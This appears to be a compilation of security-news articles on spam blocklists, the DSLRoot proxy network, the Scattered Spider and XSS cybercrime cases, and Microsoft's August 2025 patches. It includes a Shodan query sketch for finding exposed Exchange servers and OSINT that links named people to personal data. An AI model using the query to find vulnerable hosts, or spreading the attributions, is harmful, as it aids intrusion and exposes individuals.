
GOP Cries Censorship Over Spam Filters That Work

The chairman of the Federal Trade Commission (FTC) last week sent a letter to Google’s CEO demanding to know why Gmail was blocking messages from Republican senders while allegedly failing to block similar missives supporting Democrats. The letter followed media reports accusing Gmail of disproportionately flagging messages from the GOP fundraising platform WinRed and sending them to the spam folder. But according to experts who track daily spam volumes worldwide, WinRed’s messages are getting blocked more often because its methods of blasting email are far spammier than those of ActBlue, the fundraising platform for Democrats.

Image: nypost.com

On Aug. 13, The New York Post ran an “exclusive” story titled, “Google caught flagging GOP fundraiser emails as ‘suspicious’ — sending them directly to spam.” The story cited a memo from Targeted Victory – whose clients include the National Republican Senatorial Committee (NRSC), Rep. Steve Scalise and Sen. Marsha Blackburn – which said it observed that the “serious and troubling” trend was still going on as recently as June and July of this year.

“If Gmail is allowed to quietly suppress WinRed links while giving ActBlue a free pass, it will continue to tilt the playing field in ways that voters never see, but campaigns will feel every single day,” the memo reportedly said.

In an August 28 letter to Google CEO Sundar Pichai, FTC Chairman Andrew Ferguson cited the New York Post story and warned that Gmail’s parent Alphabet may be engaging in unfair or deceptive practices.

“Alphabet’s alleged partisan treatment of comparable messages or messengers in Gmail to achieve political objectives may violate both of these prohibitions under the FTC Act,” Ferguson wrote. “And the partisan treatment may cause harm to consumers.”

However, the situation looks very different when you ask spam experts what’s going on with WinRed’s recent messaging campaigns. Atro Tossavainen and Pekka Jalonen are co-founders at Koli-Lõks OÜ, an email intelligence company in Estonia. Koli-Lõks taps into real-time intelligence about daily spam volumes by monitoring large numbers of “spamtraps” — email addresses that are intentionally set up to catch unsolicited emails.

Spamtraps are generally not used for communication or account creation, but instead are created to identify senders exhibiting spammy behavior, such as scraping the Internet for email addresses or buying unmanaged distribution lists. As an email sender, blasting these spamtraps over and over with unsolicited email is the fastest way to ruin your domain’s reputation online. Such activity also virtually ensures that more of your messages are going to start getting listed on spam blocklists that are broadly shared within the global anti-abuse community.

Tossavainen told KrebsOnSecurity that WinRed’s emails hit its spamtraps in the .com, .net, and .org space far more frequently than do fundraising emails sent by ActBlue. Koli-Lõks published a graph of the stark disparity in spamtrap activity for WinRed versus ActBlue, showing a nearly fourfold increase in spamtrap hits from WinRed emails in the final week of July 2025.

Image: Koliloks.eu

“Many of our spamtraps are in repurposed legacy-TLD domains (.com, .org, .net) and therefore could be understood to have been involved with a U.S. entity in their pre-zombie life,” Tossavainen explained in a LinkedIn post about the data.

Raymond Dijkxhoorn is the CEO and a founding member of SURBL, a widely-used blocklist that flags domains and IP addresses known to be used in unsolicited messages, phishing and malware distribution. Dijkxhoorn said their spamtrap data mirrors that of Koli-Lõks, and shows that WinRed has consistently been far more aggressive in sending email than ActBlue.

Dijkxhoorn said the fact that WinRed’s emails so often end up dinging the organization’s sender reputation is not a content issue but rather a technical one.

“On our end we don’t really care if the content is political or trying to sell viagra or penis enlargements,” Dijkxhoorn said. “It’s the mechanics, they should not end up in spamtraps. And that’s the reason the domain reputation is tempered. Not ‘because domain reputation firms have a political agenda.’ We really don’t care about the political situation anywhere. The same as we don’t mind people buying penis enlargements. But when either of those land in spamtraps it will impact sending experience.”
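Blocklists like SURBL are typically consulted with a plain DNS lookup: the domain being checked is prepended to the list’s lookup zone, and an answer in the 127.0.0.0/8 range means it is listed. Below is a minimal sketch using only Python’s standard library; the zone name follows SURBL’s documented public lookup convention, and the example domain is hypothetical.

```python
import socket

def dnsbl_listed(domain: str, zone: str = "multi.surbl.org"):
    """Check a domain against a DNS-based blocklist (DNSBL).

    Listed domains resolve to an address in 127.0.0.0/8; the meaning of the
    final octet varies by list. Unlisted domains simply fail to resolve.
    """
    try:
        answer = socket.gethostbyname(f"{domain}.{zone}")
    except socket.gaierror:
        return None  # not listed (or the lookup failed)
    return answer

# Hypothetical example domain -- not a real WinRed or ActBlue sender:
print(dnsbl_listed("example-fundraising-blast.example"))
```

Mail filters that consult such lists at delivery time will down-score or reject messages containing listed domains, which is why repeated spamtrap hits translate directly into poorer inbox placement.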

The FTC letter to Google’s CEO also referenced a debunked 2022 study (PDF) by political consultants who found Google caught more Republican emails in spam filters. Techdirt editor Mike Masnick notes that while the 2022 study also found that other email providers caught more Democratic emails as spam, “Republicans laser-focused on Gmail because it fit their victimization narrative better.”

Masnick said GOP lawmakers then filed both lawsuits and complaints with the Federal Election Commission (both of which failed easily), claiming this was somehow an “in-kind contribution” to Democrats.

“This is political posturing designed to keep the White House happy by appearing to ‘do something’ about conservative claims of ‘censorship,'” Masnick wrote of the FTC letter. “The FTC has never policed ‘political bias’ in private companies’ editorial decisions, and for good reason—the First Amendment prohibits exactly this kind of government interference.”

WinRed did not respond to a request for comment.

The WinRed website says it is an online fundraising platform supported by a united front of the Trump campaign, the Republican National Committee (RNC), the NRSC, and the National Republican Congressional Committee (NRCC).

WinRed has recently come under fire for aggressive fundraising via text message as well. In June, 404 Media reported on a lawsuit filed by a family in Utah against the RNC for allegedly bombarding their mobile phones with text messages seeking donations after they’d tried to unsubscribe from the missives dozens of times.

One of the family members said they received 27 such messages from 25 numbers, even after sending 20 stop requests. The plaintiffs in that case allege the texts from WinRed and the RNC “knowingly disregard stop requests and purposefully use different phone numbers to make it impossible to block new messages.”

Dijkxhoorn said WinRed did inquire recently about why some of its assets had been marked as a risk by SURBL, but he said they appeared to have zero interest in investigating the likely causes he offered in reply.

“They only replied with, ‘You are interfering with U.S. elections,'” Dijkxhoorn said, noting that many of SURBL’s spamtrap addresses appear publicly only in the registration records for random domain names.

“They’re at best harvested by themselves but more likely [they] just went and bought lists,” he said. “It’s not like ‘Oh Google is filtering this and not the other,’ the reason isn’t the provider. The reason is the fundraising spammers and the lists they send to.”

No, Trump Can’t Legally Federalize US Elections

The United States Constitution is clear: President Donald Trump can’t take control of the country’s elections. But he can sow confusion and fear.

China Is About to Show Off Its New High-Tech Weapons to the World

On September 3, China will hold a “Victory Day” military parade in Tiananmen Square to celebrate the 80th anniversary of its victory over Japan—and to send the West a message.

DSLRoot, Proxies, and the Threat of ‘Legal Botnets’

The cybersecurity community on Reddit responded in disbelief this month when a self-described Air National Guard member with top secret security clearance began questioning the arrangement they’d made with a company called DSLRoot, which was paying $250 a month to plug a pair of laptops into the Redditor’s high-speed Internet connection in the United States. This post examines the history and provenance of DSLRoot, one of the oldest “residential proxy” networks with origins in Russia and Eastern Europe.

The query about DSLRoot came from a Reddit user “Sacapoopie,” who did not respond to questions. This user has since deleted the original question from their post, although some of their replies to other Reddit cybersecurity enthusiasts remain in the thread. The original post was indexed here by archive.is, and it began with a question:

“I have been getting paid 250$ a month by a residential IP network provider named DSL root to host devices in my home,” Sacapoopie wrote. “They are on a separate network than what we use for personal use. They have dedicated DSL connections (one per host) to the ISP that provides the DSL coverage. My family used Starlink. Is this stupid for me to do? They just sit there and I get paid for it. The company pays the internet bill too.”

Many Redditors said they assumed Sacapoopie’s post was a joke, and that nobody with a cybersecurity background and top-secret (TS/SCI) clearance would agree to let some shady residential proxy company introduce hardware into their network. Other readers pointed to a slew of posts from Sacapoopie in the Cybersecurity subreddit over the past two years about their work on cybersecurity for the Air National Guard.

When pressed for more details by fellow Redditors, Sacapoopie described the equipment supplied by DSLRoot as “just two laptops hardwired into a modem, which then goes to a dsl port in the wall.”

“When I open the computer, it looks like [they] have some sort of custom application that runs and spawns several cmd prompts,” the Redditor explained. “All I can infer from what I see in them is they are making connections.”

When asked how they became acquainted with DSLRoot, Sacapoopie told another user they discovered the company and reached out after viewing an advertisement on a social media platform.

“This was probably 5-6 years ago,” Sacapoopie wrote. “Since then I just communicate with a technician from that company and I help trouble shoot connectivity issues when they arise.”

Reached for comment, DSLRoot said its brand has been unfairly maligned thanks to that Reddit discussion. The unsigned email said DSLRoot is fully transparent about its goals and operations, adding that it operates under full consent from its “regional agents,” the company’s term for U.S. residents like Sacapoopie.

“As although we support honest journalism, we’re against of all kinds of ‘low rank/misleading Yellow Journalism’ done for the sake of cheap hype,” DSLRoot wrote in reply to questions about the company’s intentions. “It’s obvious to us that whoever is doing this, is either lacking a proper understanding of the subject or doing it intentionally to gain exposure by misleading those who lack proper understanding.”

“We monitor our clients and prohibit any illegal activity associated with our residential proxies,” DSLRoot continued. “We honestly didn’t know that the guy who made the Reddit post was a military guy. Be it an African-American granny trying to pay her rent or a white kid trying to get through college, as long as they can provide an Internet line or host phones for us — we’re good.”

WHAT IS DSLROOT?

DSLRoot is sold as a residential proxy service on the forum BlackHatWorld under the names DSLRoot and GlobalSolutions. The company is based in the Bahamas and was formed in 2012. The service is advertised to people who are not in the United States but who want to seem like they are. DSLRoot pays people in the United States to run the company’s hardware and software — including 5G mobile devices — and in return it rents those IP addresses as dedicated proxies to customers anywhere in the world — priced at $190 per month for unrestricted access to all locations.

The DSLRoot website.

The GlobalSolutions account on BlackHatWorld lists a Telegram account and a WhatsApp number in Mexico. DSLRoot’s profile on the marketing agency digitalpoint.com from 2010 shows their previous username on the forum was “Incorptoday.” GlobalSolutions user accounts at bitcointalk[.]org and roclub[.]com include the email clickdesk@instantvirtualcreditcards[.]com.

Passive DNS records from DomainTools.com show instantvirtualcreditcards[.]com shared a host back then — 208.85.1.164 — with just a handful of domains, including dslroot[.]com, regacard[.]com, 4groot[.]com, residential-ip[.]com, 4gemperor[.]com, ip-teleport[.]com, proxysource[.]net and proxyrental[.]net.

Cyber intelligence firm Intel 471 finds GlobalSolutions registered on BlackHatWorld in 2016 using the email address prepaidsolutions@yahoo.com. This user shared that their birthday is March 7, 1984.

Several negative reviews about DSLRoot on the forums noted that the service was operated by a BlackHatWorld user calling himself “USProxyKing.” Indeed, Intel 471 shows this user told fellow forum members in 2013 to contact him at the Skype username “dslroot.”

USProxyKing on BlackHatWorld, soliciting installations of his adware via torrents and file-sharing sites.

USProxyKing had a reputation for spamming the forums with ads for his residential proxy service, and he ran a “pay-per-install” program where he paid affiliates a small commission each time one of their websites resulted in the installation of his unspecified “adware” programs — presumably a program that turned host PCs into proxies. On the other end of the business, USProxyKing sold that pay-per-install access to others wishing to distribute questionable software — at $1 per installation.

Private messages indexed by Intel 471 show USProxyKing also raised money from nearly 20 different BlackHatWorld members who were promised shareholder positions in a new business that would offer robocalling services capable of placing 2,000 calls per minute.

Constella Intelligence, a platform that tracks data exposed in breaches, finds that same IP address GlobalSolutions used to register at BlackHatWorld was also used to create accounts at a handful of sites, including a GlobalSolutions user account at WebHostingTalk that supplied the email address incorptoday@gmail.com. Also registered to incorptoday@gmail.com are the domains dslbay[.]com, dslhub[.]net, localsim[.]com, rdslpro[.]com, virtualcards[.]biz/cc, and virtualvisa[.]cc.

Recall that DSLRoot’s profile on digitalpoint.com was previously named Incorptoday. DomainTools says incorptoday@gmail.com is associated with almost two dozen domains going back to 2008, including incorptoday[.]com, a website that offers to incorporate businesses in several states, including Delaware, Florida and Nevada, for prices ranging from $450 to $550.

As we can see in this archived copy of the site from 2013, IncorpToday also offered a premier service for $750 that would allow the customer’s new company to have a retail checking account, with no questions asked.

Global Solutions was able to provide access to the U.S. banking system by offering customers prepaid cards that could be loaded with a variety of virtual payment instruments that were popular in Russian-speaking countries at the time, including WebMoney. The cards were limited to $500 balances, but non-Westerners could use them to anonymously pay for goods and services at a variety of Western companies. Cardnow[.]ru, another domain registered to incorptoday@gmail.com, demonstrated this in action.

A copy of Incorptoday’s website from 2013 offers non-US residents a service to incorporate a business in Florida, Delaware or Nevada, along with a no-questions-asked checking account, for $750.

WHO IS ANDREI HOLAS?

The oldest domain (2008) registered to incorptoday@gmail.com is andrei[.]me; another is called andreigolos[.]com. DomainTools says these and other domains registered to that email address include the registrant name Andrei Holas, from Huntsville, Ala.

Public records indicate Andrei Holas has lived with his brother — Aliaksandr Holas — at two different addresses in Alabama. Those records state that Andrei Holas’ birthday is in March 1984, and that his brother is slightly younger. The younger brother did not respond to a request for comment.

Andrei Holas maintained an account on the Russian social network Vkontakte under the email address ryzhik777@gmail.com, an address that shows up in numerous records hacked and leaked from Russian government entities over the past few years.

Those records indicate Andrei Holas and his brother are from Belarus and have maintained an address in Moscow for some time (that address is roughly three blocks away from the main headquarters of the Russian FSB, the successor intelligence agency to the KGB). Hacked Russian banking records show Andrei Holas’ birthday is March 7, 1984 — the same birth date listed by GlobalSolutions on BlackHatWorld.

A 2010 post by ryzhik777@gmail.com at the Russian-language forum Ulitka explains that the poster was having trouble getting his B1/B2 visa to visit his brother in the United States, even though he’d previously been approved for two separate guest visas and a student visa. It remains unclear if one, both, or neither of the Holas brothers still lives in the United States. Andrei explained in 2010 that his brother was an American citizen.

LEGAL BOTNETS

We can all wag our fingers at military personnel who should undoubtedly know better than to install Internet hardware from strangers, but in truth there is an endless supply of U.S. residents who will resell their Internet connection if it means they can make a few bucks from it. And these days, there are plenty of residential proxy providers who will make it worth your while.

Traditionally, residential proxy networks have been constructed using malicious software that quietly turns infected systems into traffic relays that are then sold in shadowy online forums. Most often, this malware gets bundled with popular cracked software and video files that are uploaded to file-sharing networks and that secretly turn the host device into a traffic relay. In fact, USProxyKing bragged that he routinely achieved thousands of installs per week via this method alone.

A number of residential proxy networks entice users to monetize their unused bandwidth (inviting them to violate their ISP’s terms of service in the process). Others, like DSLRoot, act as a communal VPN: by using the service you gain access to the connections of other users by default, but you also agree to share your own connection with others.

Indeed, Intel 471’s archives show the GlobalSolutions and DSLRoot accounts routinely received private messages from forum users who were college students or young people trying to make ends meet. Those messages show that many of DSLRoot’s “regional agents” often sought commissions to refer friends interested in reselling their home Internet connections (DSLRoot would offer to cover the monthly cost of the agent’s home Internet connection).

But in an era when North Korean hackers are relentlessly posing as Western IT workers by paying people to host laptop farms in the United States, letting strangers run laptops, mobile devices or any other hardware on your network seems like an awfully risky move regardless of your station in life. As several Redditors pointed out in Sacapoopie’s thread, an Arizona woman was sentenced in July 2025 to 102 months in prison for hosting a laptop farm that helped North Korean hackers secure jobs at more than 300 U.S. companies, including Fortune 500 firms.

Lloyd Davies is the founder of Infrawatch, a London-based security startup that tracks residential proxy networks. Davies said he reverse engineered the software that powers DSLRoot’s proxy service, and found it phones home to the aforementioned domain proxysource[.]net, which sells a service that promises to “get your ads live in multiple cities without getting banned, flagged or ghosted” (presumably a reference to Craigslist ads).

Davies said he found the DSLRoot installer had capabilities to remotely control residential networking equipment across multiple vendor brands.

Image: Infrawatch.app.

“The software employs vendor-specific exploits and hardcoded administrative credentials, suggesting DSLRoot pre-configures equipment before deployment,” Davies wrote in an analysis published today. He said the software performs WiFi network enumeration to identify nearby wireless networks, thereby “potentially expanding targeting capabilities beyond the primary internet connection.”

It’s unclear exactly when the USProxyKing was dethroned, but DSLRoot and its proxy offerings are not what they used to be. Davies said the entire DSLRoot network now has fewer than 300 nodes nationwide, mostly systems on DSL providers like CenturyLink and Frontier.

On Aug. 17, GlobalSolutions posted to BlackHatWorld saying, “We’re restructuring our business model by downgrading to ‘DSL only’ lines (no mobile or cable).” Asked via email about the changes, DSLRoot blamed the decline in its customer base on the proliferation of residential proxy services.

“These days it has become almost impossible to compete in this niche as everyone is selling residential proxies and many companies want you to install a piece of software on your phone or desktop so they can resell your residential IPs on a much larger scale,” DSLRoot explained. “So-called ‘legal botnets’ as we see them.”

SIM-Swapper, Scattered Spider Hacker Gets 10 Years

A 20-year-old Florida man at the center of a prolific cybercrime group known as “Scattered Spider” was sentenced to 10 years in federal prison today, and ordered to pay roughly $13 million in restitution to victims.

Noah Michael Urban of Palm Coast, Fla. pleaded guilty in April 2025 to charges of wire fraud and conspiracy. Florida prosecutors alleged Urban conspired with others to steal at least $800,000 from five victims via SIM-swapping attacks that diverted their mobile phone calls and text messages to devices controlled by Urban and his co-conspirators.

A booking photo of Noah Michael Urban released by the Volusia County Sheriff.

Although prosecutors had asked for Urban to serve eight years, Jacksonville news outlet News4Jax.com reports the federal judge in the case today opted to sentence Urban to 120 months in federal prison, ordering him to pay $13 million in restitution and undergo three years of supervised release after his sentence is completed.

In November 2024 Urban was charged by federal prosecutors in Los Angeles as one of five members of Scattered Spider (a.k.a. “Oktapus,” “Scatter Swine” and “UNC3944”), which specialized in SMS and voice phishing attacks that tricked employees at victim companies into entering their credentials and one-time passcodes at phishing websites. Urban pleaded guilty to one count of conspiracy to commit wire fraud in the California case, and the $13 million in restitution is intended to cover victims from both cases.

The targeted SMS scams spanned several months during the summer of 2022, asking employees to click a link and log in at a website that mimicked their employer’s Okta authentication page. Some SMS phishing messages told employees their VPN credentials were expiring and needed to be changed; other missives advised employees about changes to their upcoming work schedule.

That phishing spree netted Urban and others access to more than 130 companies, including Twilio, LastPass, DoorDash, MailChimp, and Plex. The government says the group used that access to steal proprietary company data and customer information, and that members also phished people to steal millions of dollars worth of cryptocurrency.

For many years, Urban’s online hacker aliases “King Bob” and “Sosa” were fixtures of the Com, a mostly Telegram and Discord-based community of English-speaking cybercriminals wherein hackers boast loudly about high-profile exploits and hacks that almost invariably begin with social engineering. King Bob constantly bragged on the Com about stealing unreleased rap music recordings from popular artists, presumably through SIM-swapping attacks. Many of those purloined tracks or “grails” he later sold or gave away on forums.

Noah “King Bob” Urban, posting to Twitter/X around the time of his sentencing today.

Sosa also was active in a particularly destructive group of accomplished criminal SIM-swappers known as “Star Fraud.” Cyberscoop’s AJ Vicens reported in 2023 that individuals within Star Fraud were likely involved in the high-profile Caesars Entertainment and MGM Resorts extortion attacks that same year.

The Star Fraud SIM-swapping group gained the ability to temporarily move targeted mobile numbers to devices they controlled by constantly phishing employees of the major mobile providers. In February 2023, KrebsOnSecurity published data taken from the Telegram channels for Star Fraud and two other SIM-swapping groups showing these crooks focused on SIM-swapping T-Mobile customers, and that they collectively claimed internal access to T-Mobile on 100 separate occasions over a 7-month period in 2022.

Reached via one of his King Bob accounts on Twitter/X, Urban called the sentence unjust, and said the judge in his case discounted his age as a factor.

“The judge purposefully ignored my age as a factor because of the fact another Scattered Spider member hacked him personally during the course of my case,” Urban said in reply to questions, noting that he was sending the messages from a Florida county jail. “He should have been removed as a judge much earlier on. But staying in county jail is torture.”

A court transcript (PDF) from a status hearing in February 2025 shows Urban was telling the truth about the hacking incident that happened while he was in federal custody. It involved an intrusion into a magistrate judge’s email account, where a copy of Urban’s sealed indictment was stolen. The judge told attorneys for both sides that a co-defendant in the California case was trying to find out about Mr. Urban’s activity in the Florida case.

“What it ultimately turned into was a big faux pas,” Judge Harvey E. Schlesinger said. “The Court’s password…business is handled by an outside contractor. And somebody called the outside contractor representing Judge Toomey saying, ‘I need a password change.’ And they gave out the password change. That’s how whoever was making the phone call got into the court.”

Microsoft Patch Tuesday, August 2025 Edition

Microsoft today released updates to fix more than 100 security flaws in its Windows operating systems and other software. At least 13 of the bugs received Microsoft’s most-dire “critical” rating, meaning they could be abused by malware or malcontents to gain remote access to a Windows system with little or no help from users.

August’s patch batch from Redmond includes an update for CVE-2025-53786, a vulnerability that allows an attacker to pivot from a compromised Microsoft Exchange Server directly into an organization’s cloud environment, potentially gaining control over Exchange Online and other connected Microsoft Office 365 services. Microsoft first warned about this bug on Aug. 6, saying it affects Exchange Server 2016 and Exchange Server 2019, as well as its flagship Exchange Server Subscription Edition.

Ben McCarthy, lead cyber security engineer at Immersive, said a rough search reveals approximately 29,000 internet-facing Exchange servers that are vulnerable to this issue, with many of them likely to have even older vulnerabilities.
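McCarthy did not describe how he arrived at that estimate, but counts like this typically come from an internet-scanning index such as Shodan. The sketch below is a hedged illustration of that approach, not McCarthy’s actual methodology: the query string is an assumption and the API key is a placeholder.

```python
import shodan  # pip install shodan

API_KEY = "YOUR_SHODAN_API_KEY"  # placeholder, not a real key
api = shodan.Shodan(API_KEY)

# Illustrative query for internet-facing Exchange servers; a real survey
# would filter further by build number to isolate vulnerable versions.
results = api.search('product:"Microsoft Exchange"', limit=10)

print("Total matches reported by the index:", results["total"])
for host in results["matches"]:
    print(host["ip_str"], host.get("hostnames"))
```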

McCarthy said the fix for CVE-2025-53786 requires more than just installing a patch; it also involves following Microsoft’s manual instructions for creating a dedicated service to oversee and lock down the hybrid connection.

“In effect, this vulnerability turns a significant on-premise Exchange breach into a full-blown, difficult-to-detect cloud compromise with effectively living off the land techniques which are always harder to detect for defensive teams,” McCarthy said.

CVE-2025-53779 is a weakness in the Windows Kerberos authentication system that allows an unauthenticated attacker to gain domain administrator privileges. Microsoft credits the discovery of the flaw to Akamai researcher Yuval Gordon, who dubbed it “BadSuccessor” in a May 2025 blog post. The attack exploits a weakness in “delegated Managed Service Account” or dMSA — a feature that was introduced in Windows Server 2025.

Some of the critical flaws addressed this month with the highest severity (between 9.0 and 9.9 CVSS scores) include a remote code execution bug in the Windows GDI+ component that handles graphics rendering (CVE-2025-53766) and CVE-2025-50165, another graphics rendering weakness. Another critical patch involves CVE-2025-53733, a vulnerability in Microsoft Word that can be exploited without user interaction and triggered through the Preview Pane.

One final critical bug tackled this month deserves attention: CVE-2025-53778, a bug in Windows NTLM, a core function of how Windows systems handle network authentication. According to Microsoft, the flaw could allow an attacker with low-level network access and basic user privileges to exploit NTLM and elevate to SYSTEM-level access — the highest level of privilege in Windows. Microsoft rates the exploitation of this bug as “more likely,” although there is no evidence the vulnerability is being exploited at the moment.

Feel free to holler in the comments if you experience problems installing any of these updates. As ever, the SANS Internet Storm Center has its useful breakdown of the Microsoft patches indexed by severity and CVSS score, and AskWoody.com is keeping an eye out for Windows patches that may cause problems for enterprises and end users.

GOOD MIGRATIONS

Windows 10 users out there likely have noticed by now that Microsoft really wants you to upgrade to Windows 11. The reason is that after the Patch Tuesday on October 14, 2025, Microsoft will stop shipping free security updates for Windows 10 computers. The trouble is, many PCs running Windows 10 do not meet the hardware specifications required to install Windows 11 (or they do, but just barely).

If the experience with Windows XP is any indicator, many of these older computers will wind up in landfills or else will be left running in an unpatched state. But if your Windows 10 PC doesn’t have the hardware chops to run Windows 11 and you’d still like to get some use out of it safely, consider installing a newbie-friendly version of Linux, like Linux Mint.

Like most modern Linux versions, Mint will run on anything with a 64-bit CPU that has at least 2GB of memory, although 4GB is recommended. In other words, it will run on almost any computer produced in the last decade.

There are many versions of Linux available, but Linux Mint is likely to offer the most intuitive interface for regular Windows users, and most of it can be configured without ever touching a text-only command-line prompt. Mint and other flavors of Linux come with LibreOffice, an open source suite of tools that includes applications similar to Microsoft Office, and it can open, edit and save documents as Microsoft Office files.

If you’d prefer to give Linux a test drive before installing it on a Windows PC, you can always download the installer image and write it to a removable USB drive. From there, reboot the computer (with the removable drive plugged in) and select the option at startup to run the operating system from the external USB drive. If you don’t see an option for that after restarting, try restarting again and hitting the F8 key, which should open a list of bootable drives. Here’s a fairly thorough tutorial that walks through exactly how to do all this.

And if this is your first time trying out Linux, relax and have fun: The nice thing about a “live” version of Linux (as it’s called when the operating system is run from a removable drive such as a CD or a USB stick) is that none of your changes persist after a reboot. Even if you somehow manage to break something, a restart will return the system back to its original state.

Who Got Arrested in the Raid on the XSS Crime Forum?

On July 22, 2025, the European police agency Europol said a long-running investigation led by the French Police resulted in the arrest of a 38-year-old administrator of XSS, a Russian-language cybercrime forum with more than 50,000 members. The action has triggered an ongoing frenzy of speculation and panic among XSS denizens about the identity of the unnamed suspect, but the consensus is that he is a pivotal figure in the crime forum scene who goes by the hacker handle “Toha.” Here’s a deep dive on what’s knowable about Toha, and a short stab at who got nabbed.

An unnamed 38-year-old man was arrested in Kiev last month on suspicion of administering the cybercrime forum XSS. Image: ssu.gov.ua.

Europol did not name the accused, but published partially obscured photos of him from the raid on his residence in Kiev. The police agency said the suspect acted as a trusted third party, arbitrating disputes between criminals and guaranteeing the security of transactions on XSS. A statement from Ukraine’s SBU security service said XSS counted among its members many cybercriminals from various ransomware groups, including REvil, LockBit, Conti, and Qilin.

Since the Europol announcement, the XSS forum resurfaced at a new address on the deep web (reachable only via the anonymity network Tor). But from reviewing the recent posts, there appears to be little consensus among longtime members about the identity of the now-detained XSS administrator.

The most frequent comment regarding the arrest was a message of solidarity and support for Toha, the handle chosen by the longtime administrator of XSS and several other major Russian forums. Toha’s accounts on other forums have been silent since the raid.

Europol said the suspect has enjoyed a nearly 20-year career in cybercrime, which roughly lines up with Toha’s history. In 2005, Toha was a founding member of the Russian-speaking forum Hack-All. That is, until it got massively hacked a few months after its debut. In 2006, Toha rebranded the forum to exploit[.]in, which would go on to draw tens of thousands of members, including an eventual Who’s-Who of wanted cybercriminals.

Toha announced in 2018 that he was selling the Exploit forum, prompting rampant speculation on the forums that the buyer was secretly a Russian or Ukrainian government entity or front person. However, those suspicions were unsupported by evidence, and Toha vehemently denied the forum had been given over to authorities.

One of the oldest Russian-language cybercrime forums was DaMaGeLaB, which operated from 2004 to 2017, when its administrator “Ar3s” was arrested. In 2018, a partial backup of the DaMaGeLaB forum was reincarnated as xss[.]is, with Toha as its stated administrator.

CROSS-SITE GRIFTING

Clues about Toha’s early presence on the Internet — from ~2004 to 2010 — are available in the archives of Intel 471, a cyber intelligence firm that tracks forum activity. Intel 471 shows Toha used the same email address across multiple forum accounts, including at Exploit, Antichat, Carder[.]su and inattack[.]ru.

DomainTools.com finds Toha’s email address — toschka2003@yandex.ru — was used to register at least a dozen domain names — most of them from the mid- to late 2000s. Apart from exploit[.]in and a domain called ixyq[.]com, the other domains registered to that email address end in .ua, the top-level domain for Ukraine (e.g. deleted.org[.]ua, lj.com[.]ua, and blogspot.org[.]ua).

A 2008 snapshot of a domain registered to toschka2003@yandex.ru and to Anton Medvedovsky in Kiev. Note the message at the bottom left, “Protected by Exploit.in.” Image: archive.org.

Nearly all of the domains registered to toschka2003@yandex.ru contain the name Anton Medvedovskiy in the registration records, except for the aforementioned ixyq[.]com, which is registered to the name Yuriy Avdeev in Moscow.

This Avdeev surname came up in a lengthy conversation with Lockbitsupp, the leader of the rapacious and destructive ransomware affiliate group Lockbit. The conversation took place in February 2024, when Lockbitsupp asked for help identifying Toha’s real-life identity.

In early 2024, the leader of the Lockbit ransomware group — Lockbitsupp — asked for help investigating the identity of the XSS administrator Toha, which he claimed was a Russian man named Anton Avdeev.

Lockbitsupp didn’t share why he wanted Toha’s details, but he maintained that Toha’s real name was Anton Avdeev. I declined to help Lockbitsupp in whatever revenge he was planning on Toha, but his question made me curious to look deeper.

It appears Lockbitsupp’s query was based on a now-deleted Twitter post from 2022, when a user by the name “3xp0rt” asserted that Toha was a Russian man named Anton Viktorovich Avdeev, born October 27, 1983.

Searching the web for Toha’s email address toschka2003@yandex.ru reveals a 2010 sales thread on the forum bmwclub.ru where a user named Honeypo was selling a 2007 BMW X5. The ad listed the contact person as Anton Avdeev and gave the contact phone number 9588693.

A search on the phone number 9588693 in the breach tracking service Constella Intelligence finds plenty of official Russian government records with this number, date of birth and the name Anton Viktorovich Avdeev. For example, hacked Russian government records show this person has a Russian tax ID and SIN (Social Security number), and that they were flagged for traffic violations by Moscow police on several occasions: in 2004, 2006, 2009, and 2014.

Astute readers may have noticed by now that the ages of Mr. Avdeev (41) and the XSS admin arrested this month (38) are a bit off. This would seem to suggest that the person arrested is someone other than Mr. Avdeev, who did not respond to requests for comment.

A FLY ON THE WALL

For further insight on this question, KrebsOnSecurity sought comments from Sergeii Vovnenko, a former cybercriminal from Ukraine who now works at the security startup paranoidlab.com. I reached out to Vovnenko because for several years beginning around 2010 he was the owner and operator of thesecure[.]biz, an encrypted “Jabber” instant messaging server that Europol said was operated by the suspect arrested in Kiev. Thesecure[.]biz grew quite popular among many of the top Russian-speaking cybercriminals because it scrupulously kept few records of its users’ activity, and its administrator was always a trusted member of the community.

The reason I know this historic tidbit is that in 2013, Vovnenko — using the hacker nicknames “Fly,” and “Flycracker” — hatched a plan to have a gram of heroin purchased off of the Silk Road darknet market and shipped to our home in Northern Virginia. The scheme was to spoof a call from one of our neighbors to the local police, saying this guy Krebs down the street was a druggie who was having narcotics delivered to his home.

I happened to be lurking on Flycracker’s private cybercrime forum when his heroin-framing plan was carried out, and called the police myself before the smack eventually arrived in the U.S. Mail. Vovnenko was later arrested for unrelated cybercrime activities, extradited to the United States, convicted, and deported after a 16-month stay in the U.S. prison system [on several occasions, he has expressed heartfelt apologies for the incident, and we have since buried the hatchet].

Vovnenko said he purchased a device for cloning credit cards from Toha in 2009, and that Toha shipped the item from Russia. Vovnenko explained that he (Flycracker) was the owner and operator of thesecure[.]biz from 2010 until his arrest in 2014.

Vovnenko believes thesecure[.]biz was stolen while he was in jail, either by Toha and/or an XSS administrator who went by the nicknames N0klos and Sonic.

“When I was in jail, [the] admin of xss.is stole that domain, or probably N0klos bought XSS from Toha or vice versa,” Vovnenko said of the Jabber domain. “Nobody from [the forums] spoke with me after my jailtime, so I can only guess what really happened.”

N0klos was the owner and administrator of an early Russian-language cybercrime forum known as Darklife[.]ws. However, N0klos also appears to be a lifelong Russian resident, and in any case seems to have vanished from Russian cybercrime forums several years ago.

Asked whether he believes Toha was the XSS administrator who was arrested this month in Ukraine, Vovnenko maintained that Toha is Russian, and that “the French cops took the wrong guy.”

WHO IS TOHA?

So who did the Ukrainian police arrest in response to the investigation by the French authorities? It seems plausible that the BMW ad invoking Toha’s email address and the name and phone number of a Russian citizen was simply misdirection on Toha’s part — intended to confuse and throw off investigators. Perhaps this even explains the Avdeev surname surfacing in the registration records from one of Toha’s domains.

But sometimes the simplest answer is the correct one. “Toha” is a common Slavic nickname for someone with the first name “Anton,” and that matches the name in the registration records for more than a dozen domains tied to Toha’s toschka2003@yandex.ru email address: Anton Medvedovskiy.

Constella Intelligence finds there is an Anton Gannadievich Medvedovskiy living in Kiev who will be 38 years old in December. This individual owns the email address itsmail@i.ua, as well as an Airbnb account featuring a profile photo of a man with roughly the same hairline as the suspect in the blurred photos released by the Ukrainian police. Mr. Medvedovskiy did not respond to a request for comment.

